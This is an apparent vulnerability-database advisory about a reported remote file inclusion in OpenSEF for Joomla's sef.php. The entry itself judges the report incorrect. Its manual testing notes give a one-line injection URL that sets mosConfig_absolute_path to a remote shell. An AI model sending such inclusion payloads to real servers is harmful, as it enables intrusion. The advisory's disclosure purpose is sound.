OpenSEF for Joomla sef.php mosConfig_absolute_path Variable Remote File Inclusion

2006-07-15T03:08:11
ID OSVDB:29003
Type osvdb
Reporter O.U.T.L.A.W.(outlaw@aria-security.net)
Modified 2006-07-15T03:08:11

Description

Vulnerability Description

OpenSEF has been reported to contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is supposedly due to the sef.php script not properly sanitizing user input supplied to the 'mosConfig_absolute_path' variable. However, subsequent examination shows that the variable is previously set in another file and can not be manipulated by an attacker.

Solution Description

The vulnerability reported is incorrect. No solution required.

Short Description

OpenSEF has been reported to contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is supposedly due to the sef.php script not properly sanitizing user input supplied to the 'mosConfig_absolute_path' variable. However, subsequent examination shows that the variable is previously set in another file and can not be manipulated by an attacker.

Manual Testing Notes

http://[target]/sef.php?mosConfig_absolute_path=SHELL

References:

Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,77301.0.html Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,79477.0.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0458.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0392.html CVE-2006-4320 Bugtraq ID: 19600